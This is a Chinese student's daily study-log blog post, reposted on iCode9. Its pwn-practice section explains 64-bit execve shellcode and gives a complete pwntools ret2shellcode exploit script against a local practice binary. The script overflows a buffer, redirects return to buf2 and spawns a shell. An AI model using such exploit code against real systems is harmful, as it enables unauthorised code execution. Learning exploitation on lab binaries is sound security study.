ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

9-6学习打卡(6.14)

2021-06-15 00:02:03  阅读:170  来源: 互联网

标签:rdi buf2 6.14 学习 地址 64 打卡 小章 shellcode


昨天休息了一天(感觉是好久没休息了),打了一下午狼人杀剧本杀、打麻将,好快乐,不过一日不学果然心慌慌,不过我感觉学习模式该调整一下,每天起来得先写好list,要不然效率不够高。

6.14 to do list:

1.每日Pwn学习

2.级数复习 to 数据结构小章 and 算法小章

3.Cpp第一章

4.密码工程练习(附加)

 

一:每日Pwn学习

64位调用shellcode

64位shellcode流程

几个需要注意的细节:

1.rax是调用3b

2.rdi传参细节,首先xor清零,第二压入堆栈,第三讲/bin//sh赋值到rdi,再压入堆栈,最后将rsp地址给rdi

现在栈的数据是0x2f62696e2f73680,小端存储第一步和第二步的目的是最后的值0截断,以防后面的数据连续读

3.syscall

gcc输出64位文件记得 要在-o 前打-m64或则不打

一个是gets要获取的地址,一个是puts要获取的地址

64位的程序会返回一个8字节的地址,peda是可以直接查询偏移的

但pwndbg是不行是,正确的返回地址是后四个字节(因为小端存储)

这样查即可

思路就是第一个gets覆盖返回地址到buf2,第二个gets存入buf2的shellcode

exp.py(才发现直接复制过来会出事,那只能上传无注释版的了)

from pwn import *

context(arch = "amd64" , os = "linux")

#context.log_level = "debug"

p = process("./ret2shellcode_64")

offset = 40

e = ELF("./ret2shellcode_64")

buf2 = e.symbols["buf2"]

shellcode = asm(shellcraft.sh())

payload1 = offset * "P" + p64(buf2)

payload2 = shellcode.ljust(200,'Z')

p.recvuntil(": ")

p.sendline(payload1)

p.recvuntil(": ")

p.sendline(payload2)

print buf2

p.interactive()

 

二:级数复习

级数已复习,完成算法导论第二章,好有意思,准备再看一遍结尾,本来想着看个小章,由于数据结构另一个在看,于是看完这一章(虽然不长),但今天数据结构没法打卡了。

 

三:CPP

看到了本书约定,又又又又看了次C的历程,真是每次看每次感觉不一样。

 

四:密码工程

这个附加项今天没精力完成了,GOOD NIGHT.

标签:rdi,buf2,6.14,学习,地址,64,打卡,小章,shellcode
来源: https://blog.csdn.net/weixin_50166464/article/details/117903565

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有